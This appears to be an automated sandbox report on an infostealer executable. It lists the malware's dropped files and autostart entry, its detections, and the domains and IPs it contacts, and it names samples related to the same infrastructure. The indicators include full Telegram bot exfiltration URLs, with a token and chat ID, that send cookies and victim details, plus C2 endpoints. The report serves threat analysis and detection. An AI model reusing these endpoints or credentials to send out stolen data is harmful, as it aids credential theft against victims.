              Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 312 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
              IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Network Configuration Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
              Behavior Graph (rendered figure; ID 1481105, sample DSD876543456780000.exe, start date 25/07/2024, architecture WINDOWS, score 100). Node data recoverable from the figure text:
              - Process tree: DSD876543456780000.exe -> chordates.exe -> svchost.exe; wscript.exe -> chordates.exe -> svchost.exe.
              - Dropped files: C:\Users\user\AppData\Local\...\chordates.exe (PE32); C:\Users\user\AppData\...\chordates.vbs (data).
              - Network: reallyfreegeoip.org; api.telegram.org (149.154.167.220, port 443, TELEGRAMRU, United Kingdom); checkip.dyndns.com (158.101.44.242, ORACLE-BMC-31898US, United States); plus other IPs or domains.
              - Signatures attached to nodes: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); Tries to detect the country of the analysis system (by using the IP); Uses the Telegram API (likely for C&C communication); Binary is likely a compiled AutoIt script file; Found API chain indicative of sandbox detection; Windows Scripting host queries suspicious COM object (likely to drop second stage); Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Writes to foreign memory regions; Maps a DLL or memory area into another process; System process connects to network (likely due to code injection or exploit); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc).

              Source | Detection | Scanner | Label | Link
              DSD876543456780000.exe | 38% | ReversingLabs | Win32.Infostealer.Tinba |
              DSD876543456780000.exe | 100% | Joe Sandbox ML | |

              Source | Detection | Scanner | Label | Link
              C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | 100% | Joe Sandbox ML | |
              C:\Users\user\AppData\Local\nonsubmerged\chordates.exe | 38% | ReversingLabs | Win32.Infostealer.Tinba |
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              reallyfreegeoip.org | 0% | Virustotal | | Browse
              api.telegram.org | 2% | Virustotal | | Browse
              mail.vvtrade.vn | 0% | Virustotal | | Browse
              checkip.dyndns.com | 0% | Virustotal | | Browse
              checkip.dyndns.org | 0% | Virustotal | | Browse
              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              reallyfreegeoip.org | 188.114.97.3 | true | true | | unknown
              api.telegram.org | 149.154.167.220 | true | true | | unknown
              mail.vvtrade.vn | 118.69.190.131 | true | true | | unknown
              checkip.dyndns.com | 158.101.44.242 | true | true | | unknown
              checkip.dyndns.org | unknown | unknown | true | | unknown
              Name | Malicious | Antivirus Detection | Reputation
              https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery | true | Avira URL Cloud: safe | unknown
              https://reallyfreegeoip.org/xml/8.46.123.33 | true | URL Reputation: safe | unknown
              http://checkip.dyndns.org/ | true | URL Reputation: safe | unknown
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | true | Avira URL Cloud: safe | unknown
              https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D | true | Avira URL Cloud: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://www.office.com/
• Source: svchost.exe, 00000006.00000002.4473666032.0000000005749000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000573A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://duckduckgo.com/chrome_newtab
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://duckduckgo.com/ac/?q=
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://api.telegram.org
• Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp
• Malicious: true
• 1%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://api.telegram.org/bot
• Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
• Malicious: true
• 1%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20a
• Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 1%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
http://c.pki.goog/we1/OuqGbJkzwhU.crl0
• Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://www.office.com/lB
• Source: svchost.exe, 00000003.00000002.4473198929.0000000005337000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005744000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
http://c.pki.goog/r/gsr1.crl0
• Source: svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
http://checkip.dyndns.org
• Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
https://api.telegram.org/bot/sendMessage?chat_id=&text=
• Source: svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://chrome.google.com/webstore?hl=en
• Source: svchost.exe, 00000006.00000002.4473666032.0000000005718000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://www.ecosia.org/newtab/
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
http://varders.kozow.com:8081
• Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 15%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
http://o.pki.goog/s/we1/Ges0%
• Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://api.telegram.org/bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443
• Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
http://aborters.duckdns.org:8081
• Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 12%, Virustotal
• Avira URL Cloud: malware
• Reputation: unknown
https://ac.ecosia.org/autocomplete?q=
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
http://51.38.247.67:8081/_send_.php?L
• Source: svchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 3%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
https://reallyfreegeoip.org/xml/8.46.123.33$
• Source: svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005208000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005617000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.000000000565C000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
http://mail.vvtrade.vn
• Source: svchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• 0%, Virustotal
• Avira URL Cloud: safe
• Reputation: unknown
http://anotherarmy.dns.army:8081
• Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: malware
• Reputation: unknown
http://i.pki.goog/gsr1.crt0-
• Source: svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
http://c.pki.goog/r/r4.crl0
• Source: svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
http://checkip.dyndns.org/q
• Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
https://chrome.google.com/webstore?hl=enlB
• Source: svchost.exe, 00000006.00000002.4473666032.0000000005713000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
https://reallyfreegeoip.org
• Source: svchost.exe, 00000003.00000002.4473198929.000000000524E000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005275000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005670000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.0000000005696000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
http://i.pki.goog/r4.crt0
• Source: svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
http://api.telegram.org
• Source: svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
• Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
• Source: svchost.exe, 00000003.00000002.4475385643.000000000645A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4475385643.0000000006213000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.0000000006623000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4475799981.000000000686A000.00000004.00000800.00020000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
http://i.pki.goog/we1.crt05
• Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
• Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
• Malicious: false
• Avira URL Cloud: safe
• Reputation: unknown
https://reallyfreegeoip.org/xml/
• Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.00000000051DE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055EE000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp
• Malicious: false
• URL Reputation: safe
• Reputation: unknown
IP | Domain | Country | ASN | ASN Name | Malicious
149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | true
188.114.97.3 | reallyfreegeoip.org | European Union | 13335 | CLOUDFLARENETUS | true
118.69.190.131 | mail.vvtrade.vn | Viet Nam | 18403 | FPT-AS-APTheCorporationforFinancingPromotingTechnolo | true
158.101.44.242 | checkip.dyndns.com | United States | 31898 | ORACLE-BMC-31898US | true
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1481105
              Start date and time:2024-07-25 03:33:43 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 12m 6s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:10
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Sample name:DSD876543456780000.exe
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winEXE@10/10@4/4
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 99%
              • Number of executed functions: 54
              • Number of non-executed functions: 296
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Override analysis time to 240000 for current running targets taking high CPU consumption
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
              • Report creation exceeded maximum time and may have missing disassembly code information.
              • Report size exceeded maximum capacity and may have missing behavior information.
              • Report size exceeded maximum capacity and may have missing disassembly code.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
Time | Type | Description
03:34:37 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\chordates.vbs
21:34:36 | API Interceptor | 14030001x Sleep call for process: svchost.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220
  Install.msi | malicious | Unknown
  rPO0977-6745.exe | malicious | Snake Keylogger
  z23RevisedInvoice.exe | malicious | DarkCloud, PureLog Stealer
  Updated PI.exe | malicious | AgentTesla, RedLine
  rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
  231210-06-AgentTesla-9da180.exe | malicious | AgentTesla
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger
  Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger
  Purchase Order.exe | malicious | DarkTortilla, Snake Keylogger
  List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger
188.114.97.3
  http://kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror | malicious | HTMLPhisher
  • kjhjgfhjkfkhkhnjrgeiur97r0rg4.pages.dev/shawerror
  Quotation.xls | malicious | Remcos
  • tny.wtf/jk8Z5I
  NUEVO ORDEN01_202407238454854.pdf.exe | malicious | FormBook
  • www.010101-11122-2222.cloud/rn94/?ndsLnTq=grMJGHTOpxQfD2iixWctBZvhCYtmqSbLUJDCoaQDnQJ3Rh8vFQmgv7kvDLvYcoaVSk1M&pPO=DFQxUrcpRxVH
  DRAFT AWB and DRAFT Commercial invoice.xls | malicious | Remcos
  • tny.wtf/cyd
  QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown
  • filetransfer.io/data-package/4jaIXkvS/download
  QUOTATION_JULQTRA071244.PDF.scr.exe | malicious | Unknown
  • filetransfer.io/data-package/PM6yPStj/download
  QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown
  • filetransfer.io/data-package/0DmcWsUI/download
  QUOTATION_JULQTRA071244#U00faPDF.scr.exe | malicious | Unknown
  • filetransfer.io/data-package/4jaIXkvS/download
  QUOTATION_JULQTRA071244.PDF.scr.exe | malicious | Unknown
  • filetransfer.io/data-package/PM6yPStj/download
  Purchase Order - P04737.xls | malicious | Snake Keylogger, VIP Keylogger
  • tny.wtf/Dl
118.69.190.131
  NATV0980090004.scr.exe | malicious | Snake Keylogger, VIP Keylogger
  ER987654567909.bat.exe | malicious | Snake Keylogger, VIP Keylogger
158.101.44.242
  Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger
  • checkip.dyndns.org/
  rPO0977-6745.exe | malicious | Snake Keylogger
  • checkip.dyndns.org/
  z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger
  • checkip.dyndns.org/
  rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
  • checkip.dyndns.org/
  rRFQ_025261-97382.exe | malicious | Snake Keylogger
  • checkip.dyndns.org/
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger
  • checkip.dyndns.org/
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger
  • checkip.dyndns.org/
  List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger
  • checkip.dyndns.org/
  Apixaban - August 2024.XLS.exe | malicious | Snake Keylogger
  • checkip.dyndns.org/
  KQtHehIECg.exe | malicious | Snake Keylogger
  • checkip.dyndns.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
reallyfreegeoip.org
  Deye Union - PO # 23081377.exe | malicious | Snake Keylogger
  • 188.114.97.3
  rPO0977-6745.exe | malicious | Snake Keylogger
  • 188.114.97.3
  z1QuotationSheetVSAA6656776.exe | malicious | GuLoader, Snake Keylogger
  • 172.67.177.134
  rcrypt.exe | malicious | PureLog Stealer, Snake Keylogger, VIP Keylogger
  • 188.114.96.3
  SecuriteInfo.com.Exploit.CVE-2018-0798.4.16578.20925.rtf | malicious | Snake Keylogger, VIP Keylogger
  • 188.114.96.3
  Purchase Order POT-247110.scr.exe | malicious | Snake Keylogger, VIP Keylogger
  • 188.114.96.3
  SecuriteInfo.com.Trojan.PackedNET.2944.2376.13684.exe | malicious | Snake Keylogger
  • 188.114.96.3
  SecuriteInfo.com.Exploit.CVE-2017-11882.123.25886.26681.rtf | malicious | Snake Keylogger
  • 188.114.96.3
  Purchase Order.exe | malicious | DarkTortilla, Snake Keylogger
  • 188.114.96.3
  List & Sample_Doc3.exe | malicious | GuLoader, Snake Keylogger
  • 188.114.97.3
checkip.dyndns.com
  Confirmation transfer Note AGS # 22-00379.exe | malicious | GuLoader, Snake Keylogger
  • 158.101.44.242
  Deye Union - PO # 23081377.exe | malicious | Snake Keylogger
  • 132.226.247.73
